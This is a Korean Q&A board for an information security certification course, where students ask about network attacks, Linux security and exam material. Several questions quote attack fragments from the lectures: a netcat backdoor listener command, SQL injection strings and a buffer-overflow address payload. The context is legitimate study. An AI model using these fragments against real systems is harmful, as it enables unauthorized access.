안녕하세요! 240p SMURF Attack 3) 실습자료 관련해서 2번 패킷캡처: 공격자 호스트 관점 이미지를 보면 공격자는 희생자의 주소 (10.10.10.20)으로 ip Spoof를 한다고 나와있는데,,, 3번 희생자 호스트 관점 패킷캡처를 보면 Destination IP(희생자 주소) 가 192.168.57.20으로 표기가 되어 있습니다. 2번(10.10.10.20)과 3번(192.168.57.20)이 상이한 이유가 뭘까요? 두 값이 동일해야는거 아닌가요?? 궁금합니다. (강의 잘 듣고 있습니다. 감사합니다~)
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
질문입니다
선생님 기초적인 부분인데 궁금해서 질문 드립니다. $HOME은 홈디렉터리라는 의미 맞나요? 그러면 사용자의 홈디렉터리가 무슨 의미인지 궁금합니다.. 윈도우로 예를들면 바탕화면, 문서, 다운로드 등등의 디렉터리가 존재하는 곳이 홈디렉터리인가요? 그리고 일반 사용자는 당연히 root의 홈디렉터리 접근은 불가능하겠죠? 또 루트디렉터리도 따로 있는걸로 알고있는데 그럼 루트 디렉터리와 루트의 홈디렉터리의 차이는 뭔가요..?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
FTP서버와 웹서버와의 연결 방법의 차이를 알고 싶습니다.
먼저 주신 답변을 통해, httpd 프로세스의 root계정으로 LISTEN 하는 것은 어느정도 이해가 되었다고 생각은 드는데 한가지 의문점이 드는 것이 있어서요.. FTP는 클라이언트와 서버가 제어채널로 ESTABLISHED를 하고 PORT나 PASV명령을 통해 데이터 채널을 RELATED 상태로 연결해서 데이터를 주고 받는 것으로 알고 있는데요. Q. 웹서버 기준으로 LISTEN 하는 httpd로 서비스 프로세스를 열어주는 거면, apache 계정으로 열리는 서비스 프로세스는 RELATED로 열려야 하는 것 아닌가요? 왜 ESTABLISHED로 프로세스가 열리는 건가요?? 어디서 이런 어떤 차이점이 오게 되는 건지 궁금해서요..
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
보안장비 운영 snort 룰 관련 질의드립니다.
track by_src와 dst 를 결정하는 기준이 잘 이해가 안되서요. 1. 처음에는 content의 메시지를 생성하는 곳이 track by_를 결정하는 기준으로 이해를 했는데, 듣다 보니 그게 아닌 거 같아서요. 강의 기준으로 공통점을 찾아보니 any any 가 설정된 곳을 기준으로 track by 가 정해지는 걸로 보이더라구요. Q. 제가 이해하기엔, 출발지나 목적지 둘 다 content를 볼 수 있다라고 생각되는데, 어떤 기준으로 src와 dst를 정해야 하는 걸까요? - 어디서 패킷이 들어오는 지나, 나가는지 체크하기 위해서 보통 any any와 같이 사용되는 옵션일까요? - 또한, Land Attack의 예에서는 track by가 아예 빠져 있더라구요. - track by의 사용 목적이 정확히 무엇일까요 ?.. * 지식이 짧아 죄송합니다.. ㅠ,.ㅠ
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
등록기기 대수 초과 조치 문의
최대 기기 등록 대수가 몇대 인가요? 마이페이지에서 확인하고 수정할 수 있는 기능이 없네요. 집과 직장에서 온라인 강의를 수강하고자 합니다. 가능하다면 초기화 부탁드립니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
TCP RST 동작구조
47강 TCP RST 동작구조 Client 가 ack num 설정된 패킷을 날리는데 서버 포트가 닫혀있어 서버가 RST 날리는 외부 자료 그림입니다 클라이언트 ack num = 2000 인데 서버 seq num = 2001 로 나와있어서 오류가 맞는지 궁금합니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
기타 웹서버 보안대책의 웹 서비스 최소권한 관련 질문드립니다.
먼저 너무 감사드립니다. 유익한 강의를 통해 여러 지식을 쌓을 수 있는 기회를 주신 것 같아 감사한 마음을 느낍니다. 질문은 아래와 같습니다. 1.권한 탈취에 대응책으로 최소권한을 가진 사용자로 프로세스를 운영하라고 적혀있는데요 - 여기서 궁금한 점이 생기는데요. - well-known 포트로 인해 root로 httpd 리스닝 해야되는 것이 강요되고 있습니다. Q. 이렇게 되면 root권한으로 리스닝 해야하는 포트가 생기는 건데, 위험하지 않은 건가요? - 요청이 오면 서비스 프로세스가 생성되야만 동작하는 프로세스를 거치면서, 안전하게 작동하는건가요? - 어떻게 User와 Group 지시자로 안전하게 작동될 수 있다 말할 수 있는 건지 궁금합니다. - NAT나 PAT등을 통해 들어오는 패킷의 포트번호를 바꾸고, Listen 포트를 바꾸는 방법은 어떤가요? * 제가 지식이 짧아 뜬금없는 질문일 수 도 있을 거 같습니다.. * 80,443을 임의의 포트로 바꾸고, 최소권한 사용자를 통해 임의의 포트로 리스닝을 하는 것을 말 합니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
HTTP 쿠키관련 질의입니다.
쿠키랑 세션방식 차이는 해당 정보를 클라이언트에 저장하느냐 (쿠키), 서버에 저장하느냐(세션)로 이해가 되는데, 쿠키 종류에는 영속쿠키와, 세션쿠키가 있더라구요. 여기서 헷갈리는 부분이 있습니다. 세션 쿠키는 세션방식에서 사용되는 쿠키더라구요. 이거를 쿠키방식으로 구분해야 하나요? 세션방식으로 봐야하는 건가요? 세션은 서버에 세션 ID정보가 저장되서 안전하다고 하지만, 쿠키가 메모리상에 저장 된다고 하던데, 세션 ID 쿠키가 스니핑 당하면 HTTP세션 하이재킹이라고 하네요.. 이 것의 해킹(하이재킹)과 쿠키의 해킹이 무슨 차이가 있나요? 매 한가지 아닌가요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
선생님 MAC Time 질문 있습니다.
안녕하세요 선생님 MAC Time 부분 공부하다가 궁금한 부분이 생겨 질문 남깁니다. 기존에 a.txt라는 파일이 존재할 때 vi를 통해 파일의 내용을 수정(추가)하는 것이 아닌 출력 재지정을 이용해 파일의 내용을 수정(추가)할 경우 Access Time은 변경될까요?? 예를들어 echo "test" >> a.txt 이런식으로요!
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
질문이요
선생님 윈도우서버 공유폴더에서 원격관리 및 IPC용 기본 공유는 취약하지 않나요? 하디드스크 기본 공유만 중지시켜도 되는건가요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
SSH Port Forwarding 관련 질문
SSH Port Forwarding 강의 들으면서 궁금한 점이 있어 질문 남깁니다. SSH Port Forwarding 실습한 부분을 보면서 Proxy 설정을 하고 안하고의 차이가 있는지 궁금합니다. 만약 Proxy 설정이 꼭 필요하다면 그 이유는 무엇인가요? 4321 리스닝 포트를 열고 있는 쪽에서 자신의 4321 포트에 접근하기 위해 하는건가요? 포트 포워딩의 개념이 만약 local의 4321 > remote의 80 이라면, localhost:4321에 접근해야 remote:80에 접근할 수 있는 개념일까요? 그렇다면 자신의 PC에서 자신의IP:4321로 접근하면 안되는 건가요? 가능하시다면 상세히 설명 부탁드립니다! 감사합니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
루트킷 관련 질문 (p.576)
선생님 안녕하세요! 명품 강의 정말 잘 듣고 있습니다. 119강 강의(루트킷 관련) 내용 중 질문사항 입니다. 1️⃣bdoor 파일은 선생님께서 임의로 만든 백도어 목적 실행 파일이라고 하였는데, 실행시 nc 명령어 옵션인 -lvp를 붙히는 이유가 무엇인가요? (./bdoor -lvp 12345) 2️⃣-lvp는 nc에서만 사용하는 옵션 아닌가요? 선생님께서 bdoor 파일 만드실때 nc기반으로 파일을 만드신건가요? 3️⃣nc -lvp 12345 명령어 자체가 12345번 포트를 열고 리스닝하는 백도어 기능이 있는데 굳이 bdoor 파일을 만드신 이유가 무엇인가요? ㅠㅠ 초보자라 많이 헷갈리네요 답변해주시면 공부하는데 큰 힘이 될것 같습니다! 감사합니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
TCP 세션 하이재킹 질문
안녕하세요, 교수님 TCP 세션 하이재킹 관련해서 질문이 있습니다. TCP로 데이터를 주고 받을 때, 저는 수신한 Seq.num과 Ack.num에서 Ack.num 을 그대로 Seq.num으로 사용하고 Seq.num에서 +1한 것을 ACK.num으로 보내는 것으로 알고 있었습니다. Reset 동작 설명해주신 부분에서 수신한 패킷이 Seq.num = 1000, ACK.num = X인 경우에만 이에 대한 응답으로 Seq.num = 0, ACK.num = 1000 + 데이터부의 길이 = 1001이렇게 패킷을 보내는 것으로 이해했는데, 하이재킹 실습 그림에서는 일반적인 TCP통신으로 보이는데 Seq.num에 len길이를 더한 것을 ACK.num으로 전송하는 것이 제가 이해를 잘못한 것 같아 질문드립니다. ACK.num을 받은 Seq.num에서 +1 만 해서 보내야 하지 않나요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
수강중인 등록된 PC 가 바이러스로 인해 포맷
포맷 후 재수강하려 하였으나 제한댓수 에 걸려 수강을 못하고 있읍니다. 조치 부탁 드립니다
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
질문이요
선생님 질문이 있습니다. 로그인이 불필요한 계정에 bin/false, sbin/nologin을 하는데 이거 대신에 passwd -l 로 패스워드를 잠가도 상관없나요? 둘 중 하나만 돼있으면 되는지 궁금합니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
9강 프로세스 관련 궁금한게 있습니다.
1. 부모 프로세스가 죽으면 init이 대리모 프로세스가 되서 좀비 프로세스를 죽이는데, 왜 좀비 프로세스가 남아있게 되는 건가요? 커널의 문제일 때만 남아있을 수 있는 건가요? 또한, init이 주기적으로 하위 프로세스 전부에 대해서 스캔을 해서 좀비인 거를 소멸시키는 건가요? 2. 부모 프로세스가 살아있는데, 좀비 프로세스인지 어떻게 식별을 할 수 있나요? 교재에 따르면 시그널 처리가 안되어서 좀비 프로세스가 발생한다고 써있는데, 시그널 처리가 정상적이지 않으면 불특정 자식 프로세스 이상한 시그널이 갈 수 있는 가능성이 있는 거 아닌가요? IPC같은 파이프 같은게 연결되어서 알 수 있는 건가요? PGID랑도 연관이 있는건가요? 3. 프로세스의 한계 수는 어떤 걸로 확인할 수 있나요? 레지스터의 값이나 블럭의 수나 quota같은 걸 정해놓는 건가요? 코어나 쓰레드 같은거의 스펙으로 규정되는 건가요? 4. p38에 왜 자식 프로세스를 만들때 자식 프로세스에게는 0 부모에게는 자식 프로세스 PID를 반환하는 건가요? 왜냐하면, boot 프로세스 PID가 0인데 충돌이 날 가능성이 있는 건가 싶기도 하고, 왜 저런식으로 작동하는 건지 잘 이해를 못하겠습니다. 또한, ps -ef 하니까 boot 프로세스가 보이지 않는데 왜 그런건가요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
질문입니다
선생님 안녕하세요 질문이 있습니다. 섀도우 파일에서 encrypted_password 세가지 필드중에 두번째인 솔트값은 평문 패스워드에 그 솔트값을 더한다는 것인가요? 그렇게 나온 해시값이 세번째 필드인건가요? 만약 그렇다면 솔트값을 그렇게 보여지는건 취약한거 아닌가요? 강의에 나온 예시처럼 abcd1234를 공격자가 얻었다면 두번째 필드를 보고 1234가 솔트인걸 알고 abcd가 패스워드 인걸 알아낼 수 있는게 아닌지 궁금합니다. 이 예시는 이해를 돕기 위해 만든거고 실제로는 뭔가 다른건가요 ㅠㅠ
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
버퍼 오버플로우 공격 관련 질문
1. 정상 실행 시의 "AAAAAAAAAAA"는 맨 마지막 \0까지 포함에서 12byte인데, 공격에서 사용한 "A"16개는 overflow가 됐을 때 '\0'가 보이지 않습니다. perl 명령어의 기능인가요? 2. 실습 이미지의 'sizeof' 부분의 크기가 계속 4로 나오는데 오류인가요? 3. 엔디언 입력 방식에서 \x44\x85\x04\x08이 메모리 상에 입력될때, 0x08048544로 입력되는 것은 이해했는데, 그렇다면 왜 버퍼 부분의 경우에는 거꾸로 저장되지 않는지가 궁금합니다. 만약 "ABCDEFGHIJK"를 입력했다면 \0KIJGHEFCDAB가 저장되야 하지 않는지요... 늘 훌륭한 강의 감사합니다!
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
교재 질문(2024년 정보보안기사 교재) 63~64Page
위에 등록된 사진에 보면 shadow passwd 필드에 대한 내용중 *,!!,빈칸에 대한 내용이 좀 이상한데 확인 좀 부탁드립니다. !!와 빈값일 때 모두 패스워드가 설정되어 있지 않다고 되어있는데, 맞는건가요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
패스워드 정책설정 질문
1. 최소 2자이상의 대문자 요구할 경우 ucredit=-2로 적나요?? 127쪽입니다. 2. 패스워드 길이설정할때 팜모듈에서도 되고 login.defs에서도 되는건가요? 127쪽~128쪽입니다 감사합니다
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
cron.allow or deny 파일에 사용자를 추가하거나 삭제하는 방법
allow, deny 파일을 확인하는 것만 나와서 따로 명령어가 있는지 아니면 그냥 파일 편집기로 한줄 씩 계정명을 추가 삭제하면 되는지 모르겠습니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
WPA-PSK 관련 질문사항
선생님 안녕하세요! 고생이 많으십니다! 실기 PSK 인강듣고 나서, 필기 문제집에 PSK 관련 내용과 혼동이 생겨서 질문남깁니다. 실기책에는 256 비트 PSK(PMK)로 암호화에 사용되는 512비트 PTK(임시키) 생성한다고 적혀있습니다. 필기책에는 WPA-PSK는 AP와 통신해야 할 클라이언트에 암호키를 기본으로 등록해두고 있다. 그러나 암호화 키를 이용해 128비트인 통신용 암호키를 새로 생셩하고, 이 암호화 키를 10,000개 패킷마다 바꾼다. 라고 적혀있습니다. (정답 지문) 여기서 궁금한 점은 암호화 키가 쌩뚱맞게 128비트인 이유가 무엇인지 궁금합니다. 알고리즘 동작방식 중 128비트가 나올 이유가 없는데 어디서 나온것인지 의문입니다. 인증할때는 PMK로 512비트 PTK를 생성하고, 암호화 할때는 PMK로 128비트 통신용 암호화 키를 다시 생성하는것인가요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
FIN/Xmas/Null 스캔에서 닫힌 포트에서 RST+ACK응답이 오는 이유는 무엇인가요?
교재에 TCP표준에서 닫힌포트로 RST이외의 패킷을 수신하면 RST로 응답한다고 나와있는데 ACK스캔 빼고는 모두 닫힌포트에서 RST+ACK응답이 오는게 궁금합니다
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
로그파일순환관리 질문
안녕하세요. 강의 잘 듣고있습니다. logrotate 설정파일 옵션 중 create에 대해서 질문있는데요. create 퍼미션 소유자 소유그룹까지 사용하게되면 유의미한데 create만 있다면, 없는거랑 차이가 있나요? create를 주석처리해도 주기나 파일 사이즈에 따라 새롭게 순환 로그 파일을 만드는거 아닌가해서요!
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
nologin, false 질문(교재 P.62)
안녕하십니까. 언제나 좋은 강의 감사합니다. 교재 P.62에 수록된 내용 중 불필요계정에 대한 로그인 접근방지를 위한 조치 중 접근방지 대상 계정의 기존 로그인 쉘이 /bin/~일 경우 반드시 /bin/false로 조치해야 하는 것인지 아니면 /sbin/nologin 도 동일하게 로그인방지 적용이 되는지 문의드립니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
개인정보의 안전성확보조치기준
정보주체정보는 식별정보라고 되어있고 그 예시로 고객번호라고 하셨는데 나.(2)의 예시에는 누구의 개인정보를 처리하였는지 알수 있는 식별정보라기보다 정보주체의 요청내용? 이런 것 같아서요 원래 식별정보를 저렇게도 표시하는건가요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
Http 응답분할과 연관된 xss 종류
항상 강의 잘듣고 있습니다! Http 응답분할 취약점에서 악의적인 스크립트 삽입으로 xss 공격에 활용될 수 있다고 하는데 1. 이 응답분할 취약점과 연관된 xss 공격은 어떤 종류와 가까울지 궁금합니다. DB에 악성스크립트가 저장되어있지 않아서 반사형인거 같기도 하고 근데 만약 악성 스크립트가 서버에 저장되어있고 응답은 서버에서 나오는 거니까 저장형에 가까운건가 싶기도 합니다. 2. 한편으로는 클라이언트가 입력한 요청 파라미터가 응답헤더에 들어가는데, 공격자가 어떻게 요청파라미터를 입력할수 있지?라는 생각도 듭니다. 서버를 조작하는 경우도 있을거 같은데 처음 공부하다보니 생각이 막혀서 질문드립니다!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
-8664에러가 발생합니다
첨부한 그림과 같이 안드로이드 기기 에서 강의 다운로드시 -8664에러가 발생합니다 조치 방법 안내 부탁드립니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
23년 교재 문제편 139번 문제 해설 질문
139-3번 문제에서 "~~(전략) 명령어를 사용하여 /tmp 디렉터리 밑에 있는 모든 파일과 ~~(후략)" 라고 되어있는데 답안에서 목적지 디렉터리가 /home/* 로 되어있습니다!... 오류 맞을까요? 추가로 교재정오표같은건 어디서 볼 수 있을까요??
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
문제편 117번 서술형 문제의 답안을 어떻게 작성해야할까요? (23년판 교재)
문제에는 "소스코드와 공격과정을 참고하여 1. 공격명칭과 2. 대응방안에 관해 서술하시오" 라고 되어있는데 1번의 답으로 '레이스 컨디션 공격'만 써도 정답일까요 아니면, 공격명칭과 함께 레이스컨디션 공격의 개념에 관해서 추가로 서술해야할까요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
문제편을 풀다보니 이론편에서 나오지 않았던 신개념들이 보이는데 어떻게 준비해야할까요?
예를들어 12, 13번문제의 Pass the Hash공격과 크리덴셜 스터핑은 이론편을 공부하며 보지 못했던 개념인 것 같은데 실기 시험을 준비하는 입장에서 충분히 신기술을 묻는 문제가 나올 수 있다고 하는데 따로 봐야하는 신문이나 에세이같은게 있을까요? 아니면 개념편만 잘 이해하면 이런 신개념들에도 대응이 가능할까요 ㅠㅠ
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
산업기사와 기사의 출제 포인트가 얼마나 다른지 궁금합니다
이론편에서 몇몇 개념들의 기출된 기록을 보면 산업기사에서는 자주 출제됐지만 기사시험에는 하나도 안나온 개념들이 있던데 기사를 준비하는 입장에서 이런 개념들도 봐야할지 고민됩니다. 물론 전부다 챙기는게 좋겠지만 시험이 몇 주 안남은 시점에서 다른 부분에 더 신경을 쓰고싶어서 질문합니다!!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
37 네트워크 기본학습 05번 강의 중 전송계층 내용 문의
수업 중 31분 경 osi 7 layer의 트랜스포트 계층에 대해 책에선 end to end reilable delivery로 되어 있는데 TCP/ IP 프로토콜에선 전송계층에서 node to node라고 말씀하셨는데 두개가 같은 말일까요...? 제가 이해하기론 end to end가 맞아보여서요 ...! 이후 Node간 전송은 데이터링크라고 배웠는데 네트워크 계층이라고 말씀하셨는데 혼동됩니다 ㅠㅠㅠㅠ
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
모바일기기 변경 요청
안녕하세요. 오늘 처음으로 인강을 듣기 시작했는데요 모바일강의로 휴대폰으로 듣는데 화면이 너무 작아서요. 태블릿으로 듣고싶어서 그런데 기기변경 가능한가요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의 재생 오류 문의
안녕하세요 강의 접속이 안되는데 확인부탁드립니다
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
8강 36분 질문있습니다.
find명령어에서 -exec 옵션?을 통해 ls -al의 입력으로 사용하는데 이전 강의 grep처럼 | 파이프를 통해 전달할수도 있나요? 이렇게 짜잘한 질문이 많은데 계속 남겨도될까요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
인강
109강이 시간도안뜨고 다운로드도안돼요
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의 자료 다운
혹시 구름모양 강의자료를 한번에 받을 수는 없을까요? 겹쳐지는 자료도 좀 있고해서 한번에 받고싶어서요!
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
마지막 강의 공개 예정일 관련
안녕하세요, 마지막 과목이 2024.03.26 공개 예정이라고 확인되는데 아직 미공개 상태입니다. 언제 공개되나요?
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의 첨부파일 제본해서 공부하고자 하는데, 혹시 통합파일로 올려주실수 있을지 문의드립니다.
강의 첨부파일 제본해서 공부하고자 하는데, 혹시 통합파일로 올려주실수 있을지 문의드립니다.
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
기기설정이 넘어가서 아이패드로 들을 수가 없는데 어떨게 안될가요?
지금 현재. 컴퓨터와 아이폰으로 수강을 했어서 아이패드로 수강을 못하고 있습니다. 기기설정 2개 제한을 다시 하고싶은데 해결방법을 알 수 있을가요
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의와 교재내용 다를수있나요?
강의에서 etc/profile 중요하다고 하셨는데 정작 교재에는 적혀있지않네요
2024 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
sql injection 취약점의 php 코드 중에 첫번째 레코드를 추출하는 것은 어떤 역할을 하는건가요?
$row = mysql_fetch_array($result); $id = $row[id]; 이 두 줄의 역할은 무엇인지 궁금합니다!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
교재에 pacct 로그파일이 왜 acct/pacct 라고 적혀있는걸까요?
pacct파일은 /var/log/account/pacct 경로에 저장되어있던데 acct가 혹시 account를 줄인 말일까요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
DNS 증폭 DRDoS 공격에서 TXT 질의를 사용하는 이유가 궁금합니다
설명을 들었을 땐 ANY 질의가 TXT 타입을 포함한 다른 타입도 함께 전달한다고 했는데, 그럼 ANY질의는 공격자 입장에서 TXT질의의 완전한 상위호환이라고 생각이 됩니다. 그래서 실제 상황에서도 TXT 질의가 많이 쓰이는지, 그렇다하면 왜 굳이 ANY질의를 사용하지 않는지 궁금합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
23년 실기 강의가 아직 남았는데
개정부분만 따로 정리 해주시나요 아님 또 사야하는 건가요??
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
24년 강의관련 질문입니다.
1회차 실기를 보려고하는데 24년 실기강의가 너무 늦어져서 23년 강의를 듣고 있습니다. 근데 제가 알기론 24년 이후부턴 개정된 부분이 몇개 있다고 알고 있습니다. 그러면 개정된 부분을 들을려면 24년 실기강의를 추가 구매하고 들어야 되는지 아니면 23년 강의에 개정된 부분을 수정해서 올려주시는지 궁금해서 문의드립니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
24년 강의 업로드 일자
안녕하세요. 실기 관련해서 두 가지 질문 있습니다. 1. 24년 강의 업로드와 교재 출간은 언제쯤 될까요? 2. 24년 강의가 업로드 된다면 23년과 다른 부분은 법규 부분일까요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
열린포트에 FIN+ACK를 설정해서 보내면 어떻게 되나요?
TCP FIN 스캔 설명에서 S, A, R 이외의 패킷을 수신하면 열린 포트에서는 응답하지 않는다고 했는데, 4hand-shake과정처럼 FIN+ACK 패킷을 보내면 어떤 응답이 올지 궁금합니다
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
Tcp Connect 스캔에서 공격자가 ACK 패킷을 보낸 이후에 RST+ACK 패킷을 보내는 이유는 무엇일까요?
Target에서 SYN+ACK 응답으로 열려있는것을 확인하면 즉시 RST+ACK을 보내지 않고 응답으로 ACK를 보낸 후에 RST+ACK을 보내는데 이유가 궁금합니다!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
TCP 연결 설정/종료 과정에서 Active의 주체는 cliet이고 Passive의 주체는 server인가요?
교재에서는 설정과정, 종료 과정 모두 client가 Active이고 Server가 Passive 상태인데 바뀔 수도 있는건가요??
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
arp 스푸핑이 어떻게 가능한가요?
하나의 Mac 주소에는 하나의 스위치 포트가 할당 되는데 arp스푸핑은 공격자가 arp table 변조 후 피해자의 패킷을 스니핑하는 과정에서 ip 포워딩을 수행합니다. 들키지 않아야 하니까요. 이 와 같은 일련의 과정을 수행하기 위해 피해자의 mac주소는 2개의 스위치 포트를 사용해야한다는 말인데 이게 가능한가요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
8강 프로세스 관리 질문( fork()/PGID)
8강 프로세스 강의에서 Login Shell에서 a.out로 갈 때, fork()를 통해 복사본 프로세스를 생성하면서, Terminal 제어권을 넘겨준다고(다른 Process group) 하셨는데, a.out(Parent)->a.out(Child) 갈 때도, fork() 함수를 사용하는 건 동일한데, 왜 PGID가 동일한가요? 이 둘의 차이 점은 무엇인가요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
보안기사 추가요금 지불후 365일 강의로 변경여부 문의
2023년 필기 수강 완료후 정일영 선생님 실기강의를 현재 듣고 있습니다. 90일 이내에 들을려니, 시간적으로 촉박하여 보안기사(필기+실기) 365일 무제한 강의가 있는듯 한데, 추가요금 80,000원(23만원==> 31만원) 지불후 강의 변경이 가능한지요.. 현재 시청의 실기의 시청이력은 그대로 유지하면서 가능한지요 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
TCP SYN Flooding 어떤 디도스 공격유형인가요?
선생님 좋은 강의 잘듣고있습니다! 질문내용은 제목과 동일합니다. 여쭤보는 배경은 23년 실기 책으로 공부중에 211페이지 공격유형 표에는 Syn flooding이 대역폭 소진공격이라고 되어있는데 214페이지에는 서버/서비스자원 소진 공격으로 HTTP Get flooding하고 같이 묶여있어서요 한 유형으로 정의하기가 어려운 공격인건지 질문드립니다!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
해당 강의 연장 혹은 재결제
안녕하세요, 강의를 한참 듣지 못하였는데, 혹시 강의가 만료되면 연장하거나 재주문할 수 있을까요?? 2023 강의가 사라지는 것은 아니겠지요??
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
78강 SQL Injection 공격중에서 질문 있습니다.
선생님께서 39분 24초경에 or 'a' = 'a로 해도 어떤 SQL 구문에서도 정답이라고 하셨는데 그렇다면 SELECT password FROM user where username = ' ' or 1 = 1 or ' ' 이렇게 해도 정답으로 인정되나요? 이유 : or절이 하나만 참이여도 인정된다면 1 =1 이 만족하는 true식이므로 정답으로 인정될 거 같습니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
질문이 있습니다
선생님 안녕하세요 좋은 강의 감사드립니다. 제가 지금 당장 시험을 준비하기 보단 이 분야에 대해서 전체적으로 공부를 해보고 싶어서 실기 교재를 먼저 공부하고 있는데 실기교재에는 없고 필기교재에 있는 내용중 실무에서 중요하게 사용되고 꼭 한번 공부해봐야 하는 내용이 있을지 여쭤봐도 될까요?! 수업과 관련없는 개인적인 질문을 드려서 죄송합니다.. 좋은 연말 되세요~!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
좋은 강의 감사합니다
!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
문의
안녕하세요. '요청 메소드에서 GET, POST 이외에 불필요한 메소드를 허용할 경우 공격자가 이를 이용하여 웹 서버에 파일을 생성하거나 삭제 및 수정할 수 있으므로 이를 사용하지 못하도록 적절한 설정이 필요하다' 라는 글에 문의 드릴 부분이 있습니다. 웹 개발을 할 경우 rest api를 통해 http 요청을 하는데요. 이때 put과 delete는 매우 많이 사용되고 있는데, 이러할 경우에도 요청이 취약하다고 보는건가요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
Cron 로그 파일에 나오는 세부 내용의 의미
선생님 강의 항상 잘 듣고 있습니다!! 별건 아닌데 cron 로그 파일에서 /var/log/cron을 볼때 나오는 세부 내용이 갑자기 궁금해서요,, 찾아봐도 각각의 항목이 무슨 내용인지 잘 안나와서 질문드립니다!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
SSH 포트 포워등에 관해 질문이 있습니다.
선생님 안녕하세요. p.598 SSH 리모트 포드 포워딩에 관한 강의 55분 15초 정도에 선생님께서 공격자가 이미 내부에 침투했고 plink 라는 프로그램도 다운받을수 있는 상태라고 해주셨는데 그렇다면 희생자의 내부용 웹서버에도 자유롭게 접근할수 있지 않나요? 지속적으로 내부용 웹서버에 접근할수 있도록 하기 위해서 SSH 포트 포워딩을 하는 건가요?! 좋은 강의 항상 감사드립니다!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
전자 필기장
강의 중 보여주시는 선생님 전자필기장은 어디서 볼 수 있나요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의 학습시간이 이수되지 않습니다.
143강은 2번을 들었는데도 계속 25분 이수로만 나옵니다. 확인부탁드립니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
기출 395번 문제 질문드립니다.
안녕하세요. 2023년 보안기사 문제편 246쪽 395번 문제에 대한 답으로 DNS 스푸핑은 안되는지 궁금해서 질문드립니다. 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
개인정보보호법 개인정보의 암호화부분
이번에 알기사 카페를 통해 업로드해주신 실기편 추가안내자료에서 개인정보보호법 제7조 개인정보의 암호화 부분에 대해 질문이 있습니다 내용중에 이용자,정보주체가 구분되어있는데 이용자와 정보주체 각각의 단어가 어떤의미를 가지는지 차이점이 무엇인지 궁금합니다
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
개인정보 개정 관련
안녕하세요~ 알기사 카페에 개인정보 개정본 올라온거 봤습니다. 강의도 적용 된건가요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
dns서버와 네임서버의 차이점
